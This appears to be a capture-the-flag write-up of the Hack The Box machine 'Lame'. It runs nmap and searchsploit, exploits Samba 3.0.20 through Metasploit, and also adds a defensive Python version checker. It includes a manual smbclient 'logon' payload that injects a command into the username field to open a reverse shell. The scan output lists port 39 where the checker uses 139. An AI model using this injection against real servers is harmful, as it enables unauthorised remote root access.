We add the IP to the hosts file as lame.htb and scan it:

```
nmap -sC -sV -Pn lame.htb | tee nmap.txt
```

```
21/tcp  open ftp         vsftpd 2.3.4
22/tcp  open ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
39/tcp  open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
```
We look up the vsftpd version with searchsploit:

```
searchsploit vsftpd 2.3.4
```

It gives us a Metasploit module, but to do it by hand we copy it out and look at the source of the PoC:

```
searchsploit -m unix/remote/17491.rb
```
Reading it, this page appears.

So this version of vsftpd has a flaw (a backdoor) where, if you enter `:)` as the username, it gives total access to the FTP server. But in this case it is not working.
```
39/tcp  open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
```

Searching searchsploit for the Samba version returns this:

```
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | unix/remote/16320.rb
```
So, using the Samba 3.0.20 exploit from Metasploit, we get instant root access to the machine.
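As a defender-side addition (not part of the original writeup): a small Python checker that parses nmap service lines like the ones above and flags hosts whose vsftpd or Samba version falls inside the affected ranges named by the searchsploit results. The ranges and the sample scan lines come from this page; the parser, the rule format and the `find_vulnerable` / `version_key` names are my own.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample input: the service lines from the nmap -sV scan above.
NMAP_OUTPUT = """\
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
"""

# Affected ranges taken from the searchsploit titles above: [lo, hi), hi exclusive.
RULES = [
    ("vsftpd", "2.3.4", "2.3.5", "vsftpd 2.3.4 backdoored release (EDB 17491)"),
    ("Samba smbd", "3.0.20", "3.0.25rc3", "Samba 'username map script' RCE (EDB 16320)"),
]

PORT_LINE = re.compile(r"^(\d+)/(?:tcp|udp)\s+open\s+\S+\s+(.*)$")
VERSION = re.compile(r"(\d+(?:\.\d+)*)(rc\d+)?")

def version_key(text: str) -> Optional[tuple]:
    """Turn '3.0.25rc3' or '3.0.20-Debian' into a comparable tuple; None if not a version."""
    m = VERSION.fullmatch(text.split("-")[0])  # drop distro suffixes such as '-Debian'
    if not m:
        return None  # e.g. '3.X' from a fingerprint range: version unknown, not comparable
    nums = [int(p) for p in m.group(1).split(".")]
    nums += [0] * (4 - len(nums))  # pad so 3.0 and 3.0.25 compare element-wise
    # A release candidate sorts before the final release of the same number.
    pre = (0, int(m.group(2)[2:])) if m.group(2) else (1, 0)
    return tuple(nums) + (pre,)

def find_vulnerable(nmap_text: str) -> List[Tuple[int, str, str, str]]:
    """Return (port, product, version, advisory) for every line that matches a rule."""
    hits = []
    for line in nmap_text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue
        port, info = int(m.group(1)), m.group(2)
        for product, lo, hi, advisory in RULES:
            if not info.startswith(product + " "):
                continue
            token = info[len(product):].split()[0]  # first word after the product name
            key = version_key(token)
            if key is not None and version_key(lo) <= key < version_key(hi):
                hits.append((port, product, token.split("-")[0], advisory))
    return hits

if __name__ == "__main__":
    for port, product, version, advisory in find_vulnerable(NMAP_OUTPUT):
        print(f"{port}/tcp {product} {version}: {advisory}")
```

Lines whose version nmap could only fingerprint as a range (`3.X - 4.X`) are skipped rather than guessed, so the 445/tcp banner is what actually identifies the affected Samba build.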
Same exploit but done by hand, from smbclient:

```
# Connect to the machine
smbclient //lame.htb/tmp
```

Once connected, we use this command:

```
logon "./=`nohup <REVERSE SHELL>`"
```

With `logon` we are logging on to Samba, and with `nohup` we keep the spawned process from being killed when the connection hangs up.